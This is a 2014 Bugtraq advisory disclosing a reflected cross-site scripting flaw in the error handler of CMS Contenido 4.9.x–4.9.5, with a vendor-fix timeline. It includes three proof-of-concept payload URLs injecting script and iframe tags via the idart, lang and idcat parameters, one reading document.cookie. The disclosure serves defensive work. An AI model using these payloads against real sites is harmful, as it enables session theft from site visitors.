Reflecting XSS Vulnerability in CMS Contenido 4.9.x-4.9.5

From: steffen.roesemann1986@gmail.com
To: bugtraq@securityfocus.com
Cc:
Subject: Reflecting XSS Vulnerability in CMS Contenido 4.9.x-4.9.5
Date:


Advisory: Reflecting XSS Vulnerability in CMS Contenido 4.9.x-4.9.5
Advisory ID: SROEADV-2014-03
Author: Steffen Rsemann
Affected Software: CMS Contenido 4.9.x-4.9.5 (Release: 10th Dec 2014)
Vendor URL: http://www.contenido.org/de/
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

The Content Management System Contenido 4.9.x to 4.9.5 has a reflecting XSS vulnerability in its error-handler function which displays parameters on the webpage when unexpected values are being transmitted by the client. This vulnerability occurs when feature advanced mod rewrite (AMR) is disabled, which rewrites urls for SEO purposes.

==================
Technical Details:
==================

If unexpected values are being transmitted via the parameters \u201eidart\u201c, \u201elang\u201c and/or \u201eidcat\u201c to the PHP-Script

http://{IP/HOSTNAME}/cms/front_content.php

an error will be thrown which displays the passed value to the user on the webpage without sanitizing it.

Payload-Examples:

http://{IP/HOSTNAME}/cms/front_content.php?idcat=41&lang=1<script>alert("XSS")</script>

http://{IP/HOSTNAME}/cms/front_content.php?idcat=41<iframe src="some_remote_src" height="200" width="200" ></iframe>
&lang=1

http://{IP/HOSTNAME}/cms/front_content.php?idart=32<script>alert(document.cookie)</script>

=========
Solution:
=========

Update to the latest version

====================
Disclosure Timeline:
====================

17-Dec-2014 \u2013 found the vulnerability
17-Dec-2014 - informed the developers
18-Dec-2014 - response by vendor
19-Dec-2014 \u2013 fix by vendor
24-Dec-2014 - release date of this security advisory
24-Dec-2014 - post on Bugtraq

========
Credits:
========

Vulnerability found and advisory written by Steffen Rsemann.

===========
References:
===========

http://www.contenido.org/de/
http://sroesemann.blogspot.de





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.